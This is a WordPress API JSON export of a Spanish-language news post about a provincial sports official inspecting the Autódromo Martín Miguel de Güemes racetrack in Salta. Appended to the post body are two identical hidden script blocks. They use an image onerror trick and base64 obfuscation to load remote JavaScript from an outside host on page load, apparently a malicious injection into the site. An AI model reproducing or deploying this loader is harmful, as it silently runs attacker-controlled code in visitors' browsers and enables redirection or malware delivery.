{"id":4437,"date":"2024-09-24T21:04:59","date_gmt":"2024-09-25T00:04:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4437"},"modified":"2025-08-13T23:48:18","modified_gmt":"2025-08-14T02:48:18","slug":"autoridades-de-deportes-relevaron-las-instalaciones-del-autodromo-martin-miguel-de-guemes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4437","title":{"rendered":"Autoridades de Deportes relevaron las instalaciones del Aut\u00f3dromo Mart\u00edn Miguel de G\u00fcemes"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4b584b5ceb25de83f5149d718c8973ea\" style=\"background-color:#a10474\"><em>Actualmente el circuito tiene 4.300 mts y alberga las categor\u00edas de TP.1600, Standard 1100, Promocional 07, entre otras.<\/em><\/h3>\n\n\n\n<p>La subsecretaria de Deportes&nbsp;<strong>Claudia V\u00e1squez<\/strong>&nbsp;recorri\u00f3 las instalaciones del Aut\u00f3dromo Mart\u00edn Miguel de G\u00fcemes para realizar un relevamiento del predio automovil\u00edstico salte\u00f1o.<\/p>\n\n\n\n<p>\u00abVinimos a recorrer el aut\u00f3dromo y a dialogar con las autoridades del Auto Club Salta para trabajar de forma conjunta en el crecimiento y desarrollo de las actividades para fortalecer el deporte motor\u00bb, dijo Claudia V\u00e1squez&nbsp;<\/p>\n\n\n\n<p>Y finaliz\u00f3 diciendo que \u00abHicimos un relevamiento de lo que se necesita a nivel de infraestructura para sus mejoras y tambi\u00e9n hablamos de las competencias que se desarrollan durante la temporada en el Aut\u00f3dromo. Vamos a acompa\u00f1ar las actividades con el objetivo de fortalecer el deporte en este lugar\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14048-autoridades-de-deportes-relevaron-las-instalaciones-del-autodromo-martin-miguel-de-guemes-20240923214046.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14048-autoridades-de-deportes-relevaron-las-instalaciones-del-autodromo-martin-miguel-de-guemes-20240923214046.jpeg\" alt=\"Autoridades de Deportes relevaron las instalaciones del Aut\u00f3dromo Mart\u00edn Miguel de G\u00fcemes\"\/><\/a><\/figure>\n\n\n\n<p>El secretario del Auto Club Salta,&nbsp;<strong>Agust\u00edn Reynoso<\/strong>&nbsp;recibi\u00f3 a la funcionaria provincial y agradeci\u00f3 el acompa\u00f1amiento que tendr\u00e1n desde la Secretaria de Deportes. \u00abAgradecemos el apoyo y el acompa\u00f1amiento que tendremos desde el Gobierno Provincial a trav\u00e9s del organismo del deporte para el desarrollo de nuestras competencias. Ser\u00e1n bienvenidas las ayudas que podamos tener y ser\u00e1 fundamental el apoyo para el crecimiento de nuestra instituci\u00f3n\u00bb.&nbsp;<\/p>\n\n\n\n<p>Cabe destacar que el circuito del Aut\u00f3dromo Mart\u00edn Miguel de G\u00fcemes tiene 4.300 mts y alberga las categor\u00edas de TP.1600, Standard 1100, Promocional 07, entre otras.<\/p>\n\n\n\n<p>El Auto Club Salta tiene programada las fechas del 6 de octubre y 24 de noviembre para culminar la temporada 2024.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Autoridades de Deportes relevaron las instalaciones del Aut\u00f3dromo Mart\u00edn Miguel de G\u00fcemes\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/P1xiEZwFfJQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Actualmente el circuito tiene 4.300 mts y alberga las categor\u00edas de TP.1600, Standard 1100, Promocional 07, entre otras. La subsecretaria de Deportes&nbsp;Claudia V\u00e1squez&nbsp;recorri\u00f3 las instalaciones del Aut\u00f3dromo Mart\u00edn Miguel de G\u00fcemes para realizar un relevamiento del predio automovil\u00edstico salte\u00f1o. \u00abVinimos a recorrer el aut\u00f3dromo y a dialogar con las autoridades del Auto Club Salta para [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4438,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,15,18],"tags":[],"class_list":{"0":"post-4437","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-provincial","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4437"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4437"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4437\/revisions"}],"predecessor-version":[{"id":6677,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4437\/revisions\/6677"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4438"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4437"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4437"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4437"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}